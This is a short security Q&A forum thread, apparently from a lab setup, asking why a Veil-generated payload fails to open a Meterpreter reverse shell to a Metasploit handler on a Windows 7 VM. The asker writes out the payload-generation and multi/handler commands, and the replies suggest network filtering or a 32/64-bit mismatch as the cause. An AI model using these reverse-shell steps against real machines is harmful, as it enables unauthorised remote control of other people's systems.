# Where I am going wrong with Veil? Cannot get a reverse shell?

Tags: metasploit, shellcode

This is how I am generating the payload in Veil 3

```
> use XX
> set LHOST X.X.X.X
> set LPORT 3333
> generate
```

The payload generates successfully and transferred to victim machine `Win7 SP1 VM` running no antivirus of any sort.
While on metasploit end

```
> msfconsole
> use exploit/multi/handler
> set PAYLOAD windows/meterpreter/reverse_tcp
> set LHOST X.X.X.X
> set LPORT 3333
> set ExitOnSession false 
> exploit
```

`X.X.X.X` is a public IP.
While running this I get stuck to following and nothing happens

```
[*] Started reverse TCP handler on X.X.X.X:3333
```

Where am I going wrong. What could be the issue here. I have allowed port 3333 in `ufw` and no other services are listening to that port.
Also after running the payload on victim machine and doing `netstat` gives me no instance of port 3333 communicating to X.X.X.X.

Comment: Veil is pretty good but there can be quite a few reasons the connection could fail. You removed AV as a problem from the local host but need to consider the end to end network path. Are you at work where there might be a NIPS in place? I s there any sort of firewall or cloud based anti-virus between you and the destination target? Any of these network based controls can also prevent you from establishing a connection successfully.

Answer (score 0):

I've had this problem before, and my issue was that the veil payload was a 32bit version of the generated backdoor. I had to use the x64 version of the backdoor. If you don't have the 64 bit version of the payload, you'll need to update your veil and try again.